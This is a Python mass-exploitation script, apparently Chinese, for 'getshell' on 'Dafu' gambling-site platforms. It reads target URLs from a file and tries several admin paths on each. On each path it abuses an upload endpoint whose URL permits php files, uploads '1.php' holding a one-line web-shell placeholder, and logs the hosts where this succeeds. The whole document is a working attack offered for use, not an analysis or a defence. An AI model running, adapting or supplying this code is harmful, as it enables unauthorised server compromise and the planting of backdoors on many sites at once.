BC大富getshell脚本

#!/usr/bin/env python
# coding:utf-8

import requests
import json
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 彻底移除SSL认证，HTTPS警告

shell = '''这里写入一句话木马'''

class DafuGetShell(object):

    def _init__(self,):
        pass

    def Parse_url(self,arg):
        print(arg)
        ''' Url处理函数  '''
        import sys
        if sys.version_info < (3, 0):
            import urlparse
            if arg.startswith("http"):
                result = urlparse.urlparse(arg)
            else:
                result = urlparse.urlparse('http://%s' % arg)
        else:
            from urllib.parse import urlparse
            if arg.startswith("http"):
                result = urlparse(arg)
            else:
                result = urlparse('http://%s' % arg)
        if result.port is None and result.scheme == 'https':
            port = 443
        elif result.port is None and result.scheme == 'http':
            port = 80
        else:
            port = result.port
        if port == 443:
            scheme = 'https'
        else:
            scheme = 'http'
        return result.scheme+"://"+result.hostname+":"+str(port)

    def checkweak(self,url):
        boundary = '---------------------------18467633426500'
        data = []
        #data.append('\r\n')
        data.append('--%s' % boundary)
        data.append('Content-Disposition: form-data; name="imgFile"; filename="1.php"')
        data.append('Content-Type: %s\r\n' % ' text/plain')
        data.append(shell)
        data.append('--%s--\r\n' % boundary)
        http_body = '\r\n'.join(data)
        headers = {
               'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
                'Content-Type':'multipart/form-data; boundary=---------------------------18467633426500',
               }
        r = requests.post(url+"Uploads.upload.allowext.gif%7Cjpg%7Cjpeg%7Cphp%7Cpng%7Cbmp.size.2.do?dir=uploads", data=http_body,headers=headers,verify=False,timeout=5)
        ret = r.content
        if '"error":0' in str(ret) and 'uploads' in str(ret.lower()):
            return "[+] Getshell "+url+"\r"+ret


    def audit(self,arg):
        adminpath = ['/admin/Admincenter/','/aaa/Admincenter/','/wwwroot/Admincenter/','/admin/','/Admincenter/',"/"]
        for i in adminpath:
            url = arg+i

            try:
                weak = self.checkweak(url)
                if weak:
                    print("找到漏洞地址：%s"%(weak))
                    file = open('0ok.txt','a')
                    file.write("找到漏洞地址：%s\r\n"%(weak))
                    file.close()
                
            except Exception as error:
                print(error)

if __name__ == "__main__":
    try:
        if not sys.argv[1]:
            pass
    except:
        print("Use: python getdafu.py [文件名.txt]")
        exit()
    openfile=open(sys.argv[1])
    for lines in openfile.readlines():
        line = lines.strip()
        _ = DafuGetShell().audit(DafuGetShell().Parse_url(line))